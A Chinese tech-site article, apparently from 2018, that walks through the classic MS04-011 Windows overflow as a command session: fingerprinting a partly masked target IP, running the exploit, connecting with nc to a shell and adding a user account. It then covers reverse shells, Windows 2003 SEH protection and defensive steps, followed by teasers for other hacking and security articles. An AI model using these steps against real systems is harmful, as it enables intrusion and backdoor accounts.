系统漏洞溢出过程演示 溢出攻击怎么安全防范?
我们来看一下以前比较精典的一个溢出实例ms04011溢出:
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\windows\system32\cd\
C:\>
C:\>getos 2**.159.31.96 (判断操作系统)
----------------------------
THCsmbgetOS v0.1 - gets gro
by Johnny Cyberpunk (
----------------------------
[*] Connecting Port 139....
[*] Sending session request.
[*] Sending negotiation requ
[*] Sending setup account re
[*] Successful....
Remote OS:
----------
WORKGROUP
Windows 2000 LAN Manager
Windows 5.1
C:\>
C:\>ms04011 1 2**.159.31.96 (溢出格式)
shellcode size 404
Ret value = 1727
C:\>
C:\>nc 2**.159.31.96 1234(nc进行连接)
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
D:\WINDOWS\system32>(得到目标机shell)
D:\WINDOWS\system32>net user testtest /add
net user test test /add
命令成功完成。(建立用户)
上面只是简单演示了一下溢出过程,上例是正向溢出,只是直接溢出后用nc进行连接,还可以反向溢出,反向溢出一般用来突破防火墙,先用nc在本机监听一个端口,等待反向溢出的服务器连接过来从而得到一个system权限的shell。对于溢出还有很多,如iis、mso4045、ms04049、ms05039、ms05051、ms06061等还有一些精典的应用程序远程溢出,如未打sp3的mssql远程溢出可以直接得到系统权限。还有imail服务也一样可以通过远程溢出获得系统权限。还有很多病毒如冲击波、震荡波等病毒都是利用的rpc和lsass溢出漏洞,在感染一台机器后又不断的以此机器为节点扫描网络中的其它存在漏洞的机器进行溢出植入病毒程序,这样不断的繁殖下去。
不过在windiws2003下溢出就无用武之地了,因为在2003的保护机制里面还有一个技术是可控的SEH处理函数指针,2003中结构化异常处理例程注册后,它的函数指针会保存在模块中的一个叫Load Configuration Directory的地址列表中,如果函数返回时系统发现堆栈中的Cookie发生了改变,视为溢出,系统就会查看当前线程相关的SEH中是否有相应的处 理函数指针,有的话,系统将该指针与已经注册过函数的地址列表进行对照,如果没有发现匹配的,而且处理函数指针在堆栈中,异常处理函数就不运行。如果该处 理函数指针位于已加载的各个DLL模块地址范围只外,或堆中,处理函数会被执行,这种可控制的异常处理技术就会使传统的覆盖SEH指针的方法失败。虽然可以用已经加载模块以外的地址来覆盖SHE但在远程溢出中仍显得无力。
我们再来看看本地溢出,本地溢出主要用来进行权限提升,前面的serv-u的本地溢出已经注入中讲解了,我们现在再来看一下本地的一个特权提升漏洞,如图:
通过执行本地溢出直接从user用户提升到系统权限。
对溢出攻击的安全防范:
关闭139端口,停掉icp/ip netbios服务。
在本地连接的属性窗口中tcp/ip协议中的高级选项里“禁用tcp/ip上的netbios(s)”因为很多溢出都是利用的这个通道。
安装防火墙是必要的。
打上重要漏洞的补丁(如冲击波补丁、震荡波补丁),并开启系统的自动更新功能。
服务器使用windows2003系统。
- 详情2018-01-11 12:05:32责编:llp 来源:驱动管家
使用luks全盘加密的Linux系统怎么防止攻击?
由于市面上没有现成的工具能够执行这种攻击,所以我们自己制作了工具,并把它命名为EvilAbigail。Evil maid攻击可以针对任何操作系统。此次的研究我们针对的是使用LUKS全盘加密的Linux系统。一般来说,当Linux系
详情2018-01-08 16:31:05责编:llp 来源:驱动管家如何防止网站成为黑网站呢?要做这些事
1 设置严密权限上传目录只给写入、读取权限绝对不能给执行权限每个网站WebSite使用独立用户名和密码权限设置为Guest命令: net localgroup users myweb del设置MSSQL、Apache、MySQL以Guest权限运行:在运
详情2018-01-19 11:29:50责编:llp 来源:驱动管家怎么获取webshell?得到webshell获取网站控制权的十大方法
黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。本篇文章将如何获取webshell总结成为了十种方法,希望广大的企业网络管理员能够通过了解获取websh
详情2018-01-17 15:24:21责编:llp 来源:驱动管家网站漏洞扫描工具:awvs怎么进行网站漏洞扫描
使用AWVS对域名进行全局分析,深入探索:首先,介绍一下AWVS这个工具。 Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。
详情2018-01-09 10:33:24责编:llp 来源:驱动管家office 2010的技术预览版被泄露且可能受到恶意攻击
微软警告广大用户,在从第三方网站下载泄露的Office 2010技术预览版时有可能会受到恶意代码攻击,这一情况和之前的Windows 7 RC版本泄露相似,两者都被恶意代码编写者利用并作为媒介传播恶意软件。微软Office
详情2018-01-18 18:05:40责编:llp 来源:驱动管家手机停机也可以上网?手机免费上网攻略
手机停机一样可以无限量免费上网现在向大家透露一个如何激活已停机卡的方法!?激活了以后就可以免费上网了。注:《本人动感地带的卡已测,通过》!首先,准备一张已经欠费停机的卡。注意重点:《1、需要知道卡的
详情2018-01-09 15:11:13责编:llp 来源:驱动管家通信协议有哪些?各通信协议的主要用途和特点
做过网络人都知道,要实现网络间的正常通信就必需选择合适的通信协议,否则轻则就会造成网络的接入速度太慢,工作不稳定,重则根本无法接通。今天我把我实际工作积累的此方面经验与大家分享,希望对还在迷茫中的
详情2018-01-20 14:28:53责编:llp 来源:驱动管家局域网共享的安全防范技巧 保证局域网共享安全有哪些方法?
随着网络的飞速发展,现在最热的话题自然就是网络安全了。在信息时代里,几乎每个人都面临着安全威胁,都有必要对网络安全方面的知识有所了解,并能够处理一些安全方面的问题,那些平时不注意安全的人,往往在付
详情2018-01-20 18:00:31责编:llp 来源:驱动管家新型勒索病毒来袭!新型勒索蠕虫病毒petya分析报告
6月27日晚间,一波大规模勒索蠕虫病毒攻击重新席卷全球。媒体报道,欧洲、俄罗斯等多国政府、银行、电力系统、通讯系统、企业以及机场都不同程度的受到了影响。阿里云安全团队第一时间拿到病毒样本,并进行了分析
详情2018-01-10 16:04:55责编:llp 来源:驱动管家
- 自动登录机emailcrack如何破解邮箱密码?
- 怎么在淘淘搜关注达人?淘淘搜添加关注的方法是什么?
- USB3.0驱动下载好后怎么安装?USB3.0驱动安装方法是什么?
- 关于电脑设置wifi热点的几种常见方法详解
- 安装联想笔记本电源管理软件的时候总是报错怎么解决
- 电脑桌面右键菜单的小工具选项不需要怎么删除
- 电脑上网速度变慢如何提高网速
- iphone7和iphone7plus哪部手机防水好?喜欢冲浪就买iphone7
- 小米3后盖怎么打开?小米3有哪些不正确的开盖方法?
- 无线局域网上网时需要注意哪些问题?无线局域网上网条件是什么?
- 鼠标垫也需要经常清洗吗?鼠标垫怎么洗?
- 你知道中国菜刀吗?网站管理软件中国菜刀怎么用?
- 木马程序的工作原理 怎么快速彻底地清除木马病毒?
- 谷歌浏览器插件怎么安装?谷歌浏览器插件安装方法
- 音频转换精灵怎么用?音频转换精灵使用教程
- wifi信号放大器也能这样自己来制作
- 联想z500笔记本无法调节屏幕亮度怎么办
- 电脑远程桌面怎么连接本地磁盘进行文件传输
- 文件名的长度过长的情况应该怎么解决
- 输错pin码被锁怎么办?有什么方法可以破解pin码?